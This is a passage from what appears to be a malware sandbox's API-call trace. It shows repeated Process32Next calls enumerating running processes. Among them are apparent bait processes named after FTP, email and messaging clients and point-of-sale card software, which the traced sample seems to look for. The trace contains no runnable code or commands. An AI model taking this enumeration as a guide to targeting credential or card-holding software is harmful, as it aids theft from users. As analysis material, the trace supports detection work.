cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.657] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.659] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.661] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.662] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0256.664] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0256.665] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0256.667] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0256.669] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.670] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0256.672] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0256.673] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0256.675] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0256.676] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0256.678] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0256.680] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.681] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0256.683] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0256.684] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0256.686] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0256.689] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.732] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0256.733] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0256.735] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0256.736] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0256.738] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0256.739] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0256.741] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0256.742] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0256.744] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0256.745] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0256.747] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0256.749] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0256.750] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0256.752] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0256.753] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0256.754] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0256.756] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0256.758] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0256.760] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0256.761] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0256.763] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0256.764] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0256.843] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0256.845] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0256.847] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0256.850] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0256.852] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0256.854] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0256.856] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0256.858] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0256.860] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0256.862] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0256.864] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0256.866] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0256.868] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0256.870] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0256.872] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0256.873] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0256.875] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0256.878] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0256.925] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0256.927] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0256.929] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0256.931] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0256.933] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0256.935] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0256.937] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0256.938] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0256.940] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0256.942] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0256.943] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0256.945] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0256.947] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0256.949] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0256.951] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0256.953] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0256.954] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0256.956] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0256.958] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0256.998] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0256.999] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0257.001] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0257.003] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: 